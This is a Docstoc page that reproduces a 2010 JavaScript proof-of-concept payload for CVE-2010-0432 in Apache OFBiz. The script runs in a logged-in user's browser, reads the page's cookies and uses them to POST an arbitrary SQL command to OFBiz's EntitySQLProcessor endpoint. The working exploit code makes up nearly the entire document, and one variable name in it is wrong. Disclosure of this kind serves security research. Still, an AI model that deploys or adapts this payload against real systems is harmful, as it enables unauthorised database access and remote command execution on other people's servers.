Docstoc

Apache OFBiz SQL Remote Execution PoC Payload

Document Sample
Apache OFBiz SQL Remote Execution PoC Payload Powered By Docstoc
					                              Apache OFBiz SQL Remote Execution PoC Payload       Page 1/2
  1    /*
  2
  3    Apache OFBiz SQL Remote Execution PoC Payload.
  4
  5    CVE: CVE−2010−0432
  6
  7    By: Lucas Apa ( lucas −at− bonsai−sec.com ).
  8
  9    Bonsai Information Security
  10
  11   http://www.bonsai−sec.com/
  12
  13   */
  14
  15   var cmd = ’command’;
  16
  17   var xmlhttp=false;
  18   try {
  19   xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
  20   } catch (e) {
  21   try {
  22   xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  23   } catch (E) {
  24   xmlhttp = false;
  25   }
  26   }
  27
  28   if (!xmlhttp && typeof XMLHttpRequest!=’undefined’) {
  29   try {
  30   xmlhttp = new XMLHttpRequest();
  31   } catch (e) {
  32   xmlhttp=false;
  33   }
  34   }
  35   if (!xmlhttp && window.createRequest) {
  36   try {
  37   xmlhttp = window.createRequest();
  38   } catch (e) {
  39   xmlhttp=false;
  40   }
  41   }
  42
  43   xmlhttp.open("POST", "
  44   https://192.168.225.135:8443/webtools/control/EntitySQLProcessor",true);
  45   xmlhttp.onreadystatechange=function() {
  46   if (xmlhttp2.readyState==4) {
  47   //alert(xmlhttp.responseText)
  48   }
  49   }
  50
  51   var cookie = unescape(document.cookie);
  52   xmlhttp.setRequestHeader("content−type",
Lucas Apa                                                                         04/16/2010
                            Apache OFBiz SQL Remote Execution PoC Payload            Page 2/2
  53   "application/x−www−form−urlencoded");
  54   xmlhttp.setRequestHeader("cookie", cookie);
  55   var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString();
  56   var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString();
  57   var post_data = str1+cmd+str2;
  58   xmlhttp.send(post_data);




Lucas Apa                                                                            04/16/2010

				
DOCUMENT INFO